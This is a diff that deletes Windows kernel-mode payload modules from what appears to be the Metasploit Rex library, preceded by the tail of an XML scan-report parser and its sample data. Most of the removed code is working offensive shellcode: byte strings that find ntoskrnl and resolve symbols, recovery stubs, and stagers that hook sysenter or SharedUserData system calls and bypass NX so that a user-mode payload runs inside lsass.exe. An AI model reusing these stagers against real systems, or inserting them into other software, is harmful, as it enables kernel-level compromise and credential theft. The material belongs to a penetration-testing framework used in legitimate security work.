-	def xmldecl(version, encoding, standalone); end
-	def cdata; end
-	def comment(str); end
-	def instruction(name, instruction); end
-	def attlist; end
-end
-end
-end
-__END__
-<scanJob>
-	<hosts>
-		<host>
-			<ip>10.2.79.98</ip>
-			<netBIOSName>bsmith-10156B07C</netBIOSName>
-			<dnsName>bsmith-10156b07c.core.testcorp.com  random.testcorp.com</dnsName>
-			<mac>00:02:29:0E:38:2B</mac>
-			<os>Windows Server 2003 (X64), Service Pack 2</os>
-			<audit>
-				<rthID>7851</rthID>
-				<cve>CVE-2009-0089,CVE-2009-0550,CVE-2009-0086</cve>
-				<cce>N/A</cce>
-				<name>Microsoft Windows HTTP Services Multiple Vulnerabilities (960803)</name>
-				<description>Microsoft Windows HTTP Services contains multiple vulnerabilities when handling ..</description>
-				<date>09/15/2010</date>
-				<risk>Low</risk>
-				<pciLevel>5 (Urgent)</pciLevel>
-				<cvssScore>10 [AV:N/AC:L/Au:N/C:C/I:C/A:C]</cvssScore>
-				<fixInformation>....</fixInformation>
-			</audit>
-		</host>
-	</hosts>
-</scanJob>

data/lib/rex/payloads.rb DELETED Viewed

	@@ -1 +0,0 @@
1	- require 'rex/payloads/win32'

data/lib/rex/payloads/win32.rb DELETED Viewed

	@@ -1,2 +0,0 @@
1	- require 'rex/payloads/win32/common'
2	- require 'rex/payloads/win32/kernel'

data/lib/rex/payloads/win32/common.rb DELETED Viewed

@@ -1,26 +0,0 @@
-module Rex
-module Payloads
-module Win32
-module Common
-	#
-	# Returns a stub that resolves the location of a symbol and then
-	# calls it.  Refer to the following link for more details:
-	#
-	# http://uninformed.org/index.cgi?v=3&a=4&p=10
-	#
-	def self.resolve_call_sym
-		"\x60\x31\xc9\x8b\x7d\x3c\x8b\x7c\x3d\x78\x01\xef\x8b" +
-		"\x57\x20\x01\xea\x8b\x34\x8a\x01\xee\x31\xc0\x99\xac" +
-		"\xc1\xca\x0d\x01\xc2\x84\xc0\x75\xf6\x41\x66\x39\xda" +
-		"\x75\xe3\x49\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b" +
-		"\x5f\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c" +
-		"\x61\xff\xe0"
-	end
-end
-end
-end
-end

data/lib/rex/payloads/win32/kernel.rb DELETED Viewed

@@ -1,53 +0,0 @@
-module Rex
-module Payloads
-module Win32
-require 'rex/payloads/win32/kernel/common'
-require 'rex/payloads/win32/kernel/recovery'
-require 'rex/payloads/win32/kernel/stager'
-require 'rex/payloads/win32/kernel/migration'
-module Kernel
-	#
-	# Constructs a kernel-mode payload using the supplied options.  The options
-	# can be:
-	#
-	# Recovery      : The recovery method to use, such as 'spin'.
-	# Stager        : The stager method to use, such as 'sud_syscall_hook'.
-	# RecoveryStub  : The recovery stub that should be used, if any.
-	# UserModeStub  : The user-mode payload to execute, if any.
-	# KernelModeStub: The kernel-mode payload to execute, if any.
-	#
-	def self.construct(opts = {})
-		payload = nil
-		# Generate the recovery stub
-		if opts['Recovery'] and Kernel::Recovery.respond_to?(opts['Recovery'])
-			opts['RecoveryStub'] = Kernel::Recovery.send(opts['Recovery'], opts)
-		end
-		# Append supplied recovery stub information in case there is some
-		# context specific recovery that must be done.
-		if opts['AppendRecoveryStub']
-			opts['RecoveryStub'] = (opts['RecoveryStub'] || '') + opts['AppendRecoveryStub']
-		end
-		# Generate the stager
-		if opts['Stager'] and Kernel::Stager.respond_to?(opts['Stager'])
-			payload = Kernel::Stager.send(opts['Stager'], opts)
-		# Or, generate the migrator
-		elsif opts['Migrator'] and Kernel::Migration.respond_to?(opts['Migrator'])
-			payload = Kernel::Migration.send(opts['Migrator'], opts)
-		else
-			raise ArgumentError, "A stager or a migrator must be specified."
-		end
-		payload
-	end
-end
-end
-end
-end

data/lib/rex/payloads/win32/kernel/common.rb DELETED Viewed

@@ -1,54 +0,0 @@
-module Rex
-module Payloads
-module Win32
-module Kernel
-require 'rex/payloads/win32/common'
-#
-# This class provides common methods that may be shared across more than
-# one kernel-mode payload.  Many of these are from the following paper:
-#
-# http://www.uninformed.org/?v=3&a=4&t=sumry
-#
-module Common
-	#
-	# Returns a stub that will find the base address of ntoskrnl and
-	# place it in eax.  This method works by using an IDT entry.  Credit
-	# to eEye.
-	#
-	def self.find_nt_idt_eeye
-		"\x8b\x35\x38\xf0\xdf\xff\xad\xad\x48\x81\x38\x4d\x5a\x90\x00\x75\xf7"
-	end
-	#
-	# Returns a stub that will find the base address of ntoskrnl and
-	# place it in eax.  This method uses a pointer found in KdVersionBlock.
-	#
-	def self.find_nt_kdversionblock
-		"\x31\xc0\x64\x8b\x40\x34\x8b\x40\x10"
-	end
-	#
-	# Returns a stub that will find the base address of ntoskrnl and
-	# place it in eax.  This method uses a pointer found in the
-	# processor control region as a starting point.
-	#
-	def self.find_nt_pcr
-		"\xa1\x2c\xf1\xdf\xff\x66\x25\x01\xf0\x48\x66\x81\x38\x4d\x5a\x75\xf4"
-	end
-	#
-	# Alias for resolving symbols.
-	#
-	def self.resolve_call_sym
-		Rex::Payloads::Win32::Common.resolve_call_sym
-	end
-end
-end
-end
-end
-end

data/lib/rex/payloads/win32/kernel/migration.rb DELETED Viewed

@@ -1,12 +0,0 @@
-module Rex
-module Payloads
-module Win32
-module Kernel
-module Migration
-end
-end
-end
-end
-end

data/lib/rex/payloads/win32/kernel/recovery.rb DELETED Viewed

@@ -1,50 +0,0 @@
-module Rex
-module Payloads
-module Win32
-module Kernel
-#
-# Recovery stubs are responsible for ensuring that the kernel does not crash.
-# They must 'recover' after the exploit has succeeded, either by consuming
-# the thread or continuing it on with its normal execution.  Recovery stubs
-# will often be exploit dependent.
-#
-module Recovery
-	#
-	# The default recovery method is to spin the thread
-	#
-	def self.default(opts = {})
-		spin(opts)
-	end
-	#
-	# Infinite 'hlt' loop.
-	#
-	def self.spin(opts = {})
-		"\xf4\xeb\xfd"
-	end
-	#
-	# Restarts the idle thread by jumping back to the entry point of
-	# KiIdleLoop.  This requires a hard-coded address of KiIdleLoop.
-	# You can pass the 'KiIdleLoopAddress' in the options hash.
-	#
-	def self.idlethread_restart(opts = {})
-		# Default to fully patched XPSP2
-		opts['KiIdleLoopAddress'] = 0x804dbb27 if opts['KiIdleLoopAddress'].nil?
-		"\x31\xC0" +                                     # xor eax,eax
-		"\x64\xC6\x40\x24\x02" +                         # mov byte [fs:eax+0x24],0x2
-		"\x8B\x1D\x1C\xF0\xDF\xFF" +                     # mov ebx,[0xffdff01c]
-		"\xB8" + [opts['KiIdleLoopAddress']].pack('V') + # mov eax, 0x804dbb27
-		"\x6A\x00" +                                     # push byte +0x0
-		"\xFF\xE0"                                       # jmp eax
-	end
-end
-end
-end
-end
-end

data/lib/rex/payloads/win32/kernel/stager.rb DELETED Viewed

@@ -1,194 +0,0 @@
-module Rex
-module Payloads
-module Win32
-module Kernel
-#
-# Stagers are responsible for reading in another payload and executing it.
-# The reading in of the payload may actually be as simple as copying it to
-# another location.  The executing of it may be done either directly or
-# indirectly.
-#
-module Stager
-	#
-	# Works on Vista, Server 2008 and 7.
-	#
-	# Full assembly source at:
-	# /msf3/external/source/shellcode/windows/x86/src/kernel/stager_sysenter_hook.asm
-	#
-	# This payload works as follows:
-	# * Our sysenter handler and ring3 stagers are copied over to safe location.
-	# * The SYSENTER_EIP_MSR is patched to point to our sysenter handler.
-	# * The ring0 thread we are in is placed in a halted state.
-	# * Upon any ring3 proces issuing a sysenter command our ring0 sysenter handler gets control.
-	# * The ring3 return address is modified to force our ring3 stub to be called if certain conditions met.
-	# * If NX is enabled we patch the respective page table entry to disable it for the ring3 code.
-	# * Control is passed to real sysenter handler, upon the real sysenter handler finishing, sysexit will return to our ring3 stager.
-	# * If the ring3 stager is executing in the desired process our sysenter handler is removed and the real ring3 payload called.
-	#
-	def self.stager_sysenter_hook( opts = {} )
-		# The page table entry for StagerAddressUser, used to bypass NX in ring3 on PAE enabled systems (should be static).
-		pagetable = opts['StagerAddressPageTable'] || 0xC03FFF00
-		# The address in kernel memory where we place our ring0 and ring3 stager (no ASLR).
-		kstager   = opts['StagerAddressKernel'] || 0xFFDF0400
-		# The address in shared memory (addressable from ring3) where we can find our ring3 stager (no ASLR).
-		ustager   = opts['StagerAddressUser'] || 0x7FFE0400
-		# Target SYSTEM process to inject ring3 payload into.
-		process   = (opts['RunInWin32Process'] || 'lsass.exe').unpack('C*')
-		# A simple hash of the process name based on the first 4 wide chars.
-		# Assumes process is located at '*:\windows\system32\'.
-		checksum  = process[0] + ( process[2] << 8 )  + ( process[1] << 16 ) + ( process[3] << 24 )
-		# The ring0 -> ring3 payload blob.
-		r0 =	"\xFC\xFA\xEB\x1E\x5E\x68\x76\x01\x00\x00\x59\x0F\x32\x89\x46\x60" +
-				"\x8B\x7E\x64\x89\xF8\x0F\x30\xB9\x41\x41\x41\x41\xF3\xA4\xFB\xF4" +
-				"\xEB\xFD\xE8\xDD\xFF\xFF\xFF\x6A\x00\x9C\x60\xE8\x00\x00\x00\x00" +
-				"\x58\x8B\x58\x57\x89\x5C\x24\x24\x81\xF9\xDE\xC0\xAD\xDE\x75\x10" +
-				"\x68\x76\x01\x00\x00\x59\x89\xD8\x31\xD2\x0F\x30\x31\xC0\xEB\x34" +
-				"\x8B\x32\x0F\xB6\x1E\x66\x81\xFB\xC3\x00\x75\x28\x8B\x58\x5F\x8D" +
-				"\x5B\x6C\x89\x1A\xB8\x01\x00\x00\x80\x0F\xA2\x81\xE2\x00\x00\x10" +
-				"\x00\x74\x11\xBA\x45\x45\x45\x45\x81\xC2\x04\x00\x00\x00\x81\x22" +
-				"\xFF\xFF\xFF\x7F\x61\x9D\xC3\xFF\xFF\xFF\xFF\x42\x42\x42\x42\x43" +
-				"\x43\x43\x43\x60\x6A\x30\x58\x99\x64\x8B\x18\x39\x53\x0C\x74\x2E" +
-				"\x8B\x43\x10\x8B\x40\x3C\x83\xC0\x28\x8B\x08\x03\x48\x03\x81\xF9" +
-				"\x44\x44\x44\x44\x75\x18\xE8\x0A\x00\x00\x00\xE8\x10\x00\x00\x00" +
-				"\xE9\x09\x00\x00\x00\xB9\xDE\xC0\xAD\xDE\x89\xE2\x0F\x34\x61\xC3"
-		# The ring3 payload.
-		r3  = ''
-		r3 += _createthread() if opts['CreateThread'] == true
-		r3 += opts['UserModeStub'] || ''
-		# Patch in the required values.
-		r0 = r0.gsub( [ 0x41414141 ].pack("V"), [ ( r0.length + r3.length - 0x1C ) ].pack("V") )
-		r0 = r0.gsub( [ 0x42424242 ].pack("V"), [ kstager ].pack("V") )
-		r0 = r0.gsub( [ 0x43434343 ].pack("V"), [ ustager ].pack("V") )
-		r0 = r0.gsub( [ 0x44444444 ].pack("V"), [ checksum ].pack("V") )
-		r0 = r0.gsub( [ 0x45454545 ].pack("V"), [ pagetable ].pack("V") )
-		# Return the ring0 -> ring3 payload blob with the real ring3 payload appended.
-		return r0 + r3
-	end
-	#
-	# XP SP2/2K3 SP1 ONLY
-	#
-	# Returns a kernel-mode stager that transitions from r0 to r3 by placing
-	# code in an unused portion of SharedUserData and then pointing the
-	# SystemCall attribute to that unused portion.  This has the effect of
-	# causing the custom code to be called every time a user-mode process
-	# tries to make a system call.  The returned payload also checks to make
-	# sure that it's running in the context of lsass before actually running
-	# the embedded payload.
-	#
-	def self.sud_syscall_hook(opts = {})
-		r0_recovery = opts['RecoveryStub'] || Recovery.default
-		r3_payload  = opts['UserModeStub'] || ''
-		r3_prefix   = _run_only_in_win32proc_stub("\xff\x25\x08\x03\xfe\x7f", opts)
-		r3_size     = ((r3_prefix.length + r3_payload.length + 3) & ~0x3) / 4
-		r0_stager =
-			"\xEB" + [0x22 + r0_recovery.length].pack('C') + # jmp short 0x27
-			"\xBB\x01\x03\xDF\xFF"                         + # mov ebx,0xffdf0301
-			"\x4B"                                         + # dec ebx
-			"\xFC"                                         + # cld
-			"\x8D\x7B\x7C"                                 + # lea edi,[ebx+0x7c]
-			"\x5E"                                         + # pop esi
-			"\x6A" + [r3_size].pack('C')                   + # push byte num_dwords
-			"\x59"                                         + # pop ecx
-			"\xF3\xA5"                                     + # rep movsd
-			"\xBF\x7C\x03\xFE\x7F"                         + # mov edi,0x7ffe037c
-			"\x39\x3B"                                     + # cmp [ebx],edi
-			"\x74\x09"                                     + # jz
-			"\x8B\x03"                                     + # mov eax,[ebx]
-			"\x8D\x4B\x08"                                 + # lea ecx,[ebx+0x8]
-			"\x89\x01"                                     + # mov [ecx],eax
-			"\x89\x3B"                                     + # mov [ebx],edi
-			r0_recovery +
-			"\xe8" + [0xffffffd9 - r0_recovery.length].pack('V') + # call 0x2
-			r3_prefix +
-			r3_payload
-		return r0_stager
-	end
-protected
-	#
-	# Stub to run a prepended ring3 payload in a new thread.
-	#
-	# Full assembly source at:
-	# /msf3/external/source/shellcode/windows/x86/src/single/createthread.asm
-	#
-	def self._createthread
-		r3 =    "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
-				"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
-				"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
-				"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
-				"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
-				"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
-				"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
-				"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
-				"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
-				"\x31\xC0\x50\x50\x50\x8D\x9D\xA0\x00\x00\x00\x53\x50\x50\x68\x38" +
-				"\x68\x0D\x16\xFF\xD5\xC3\x58"
-		return r3
-	end
-	#
-	# This stub is used by stagers to check to see if the code is
-	# running in the context of a user-mode system process.  By default,
-	# this process is lsass.exe.  If it isn't, it runs the code
-	# specified by append.  Otherwise, it jumps past that code and
-	# into what should be the expected r3 payload to execute.  This
-	# stub also makes sure that the payload does not run more than
-	# once.
-	#
-	def self._run_only_in_win32proc_stub(append = '', opts = {})
-		opts['RunInWin32Process'] = "lsass.exe" if opts['RunInWin32Process'].nil?
-		process  = opts['RunInWin32Process'].downcase
-		checksum =
-			process[0]         +
-			(process[2] << 8)  +
-			(process[1] << 16) +
-			(process[3] << 24)
-		"\x60"                                 + # pusha
-		"\x6A\x30"                             + # push byte +0x30
-		"\x58"                                 + # pop eax
-		"\x99"                                 + # cdq
-		"\x64\x8B\x18"                         + # mov ebx,[fs:eax]
-		"\x39\x53\x0C"                         + # cmp [ebx+0xc],edx
-		"\x74\x26"                             + # jz 0x5f
-		"\x8B\x5B\x10"                         + # mov ebx,[ebx+0x10]
-		"\x8B\x5B\x3C"                         + # mov ebx,[ebx+0x3c]
-		"\x83\xC3\x28"                         + # add ebx,byte +0x28
-		"\x8B\x0B"                             + # mov ecx,[ebx]
-		"\x03\x4B\x03"                         + # add ecx,[ebx+0x3]
-		"\x81\xF9" + [checksum].pack('V')      + # cmp ecx,prochash
-		"\x75\x10"                             + # jnz 0x5f
-		"\x64\x8B\x18"                         + # mov ebx,[fs:eax]
-		"\x43"                                 + # inc ebx
-		"\x43"                                 + # inc ebx
-		"\x43"                                 + # inc ebx
-		"\x80\x3B\x01"                         + # cmp byte [ebx],0x1
-		"\x74\x05"                             + # jz 0x5f
-		"\xC6\x03\x01"                         + # mov byte [ebx],0x1
-		"\xEB" + [append.length + 1].pack('C') + # jmp stager
-		"\x61" + append						        # restore regs
-	end
-end
-end
-end
-end
-end